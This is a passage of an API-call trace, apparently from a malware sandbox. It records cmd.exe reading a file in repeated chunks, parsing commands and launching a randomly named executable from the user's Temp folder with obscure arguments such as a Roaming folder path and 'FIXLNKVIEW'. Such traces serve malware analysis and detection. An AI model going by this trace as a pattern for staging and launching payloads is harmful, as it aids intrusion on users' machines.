lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.857] _close (_FileHandle=4) returned 0 [0112.857] FindNextFileW (in: hFindFile=0x3d0f60, lpFindFileData=0x28f458 | out: lpFindFileData=0x28f458) returned 0 [0112.857] GetLastError () returned 0x12 [0112.857] FindClose (in: hFindFile=0x3d0f60 | out: hFindFile=0x3d0f60) returned 1 [0112.857] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0112.860] _close (_FileHandle=3) returned 0 [0112.860] GetConsoleTitleW (in: lpConsoleTitle=0x28f8f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.860] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe\"")) returned 0xffffffff [0112.860] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0112.860] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0112.860] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0112.860] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0112.860] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0112.860] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0112.860] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0112.860] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0112.861] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0112.861] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0112.861] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0112.861] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0112.861] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0112.862] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0112.862] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0112.862] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0112.862] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0112.862] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0112.862] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0112.862] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0112.862] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0112.862] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0112.862] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0112.862] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0112.862] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0112.862] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0112.862] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0112.862] SetErrorMode (uMode=0x0) returned 0x0 [0112.862] SetErrorMode (uMode=0x1) returned 0x0 [0112.862] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3e04b8, lpFilePart=0x28f414 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x28f414*="Temp") returned 0x23 [0112.862] SetErrorMode (uMode=0x0) returned 0x1 [0112.863] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0112.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.865] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x3e2478 [0112.866] FindClose (in: hFindFile=0x3e2478 | out: hFindFile=0x3e2478) returned 1 [0112.866] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0112.866] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0112.866] GetConsoleTitleW (in: lpConsoleTitle=0x28f688, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.866] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f510, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f5d8 | out: lpAttributeList=0x28f510, lpSize=0x28f5d8) returned 1 [0112.866] UpdateProcThreadAttribute (in: lpAttributeList=0x28f510, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f5d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f510, lpPreviousValue=0x0) returned 1 [0112.866] GetStartupInfoW (in: lpStartupInfo=0x28f4cc | out: lpStartupInfo=0x28f4cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.866] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.867] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.867] lstrcmpW (lpString1="\\hvGO9ckx.exe", lpString2="\\XCOPY.EXE") returned -1 [0112.868] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f56c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f5b8 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x28f5b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdcc, dwThreadId=0xdd0)) returned 1 [0113.112] CloseHandle (hObject=0x4c) returned 1 [0113.112] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.112] GetEnvironmentStringsW () returned 0x3e2cf0* [0113.112] FreeEnvironmentStringsW (penv=0x3e2cf0) returned 1 [0113.112] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0115.639] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28f4ac | out: lpExitCode=0x28f4ac*=0x0) returned 1 [0115.639] CloseHandle (hObject=0x50) returned 1 [0115.639] _vsnwprintf (in: _Buffer=0x28f5f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f4b8 | out: _Buffer="00000000") returned 8 [0115.639] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0115.639] GetEnvironmentStringsW () returned 0x3e2498* [0115.639] FreeEnvironmentStringsW (penv=0x3e2498) returned 1 [0115.639] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0115.639] GetEnvironmentStringsW () returned 0x3e2498* [0115.639] FreeEnvironmentStringsW (penv=0x3e2498) returned 1 [0115.639] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f510 | out: lpAttributeList=0x28f510) [0115.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0115.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 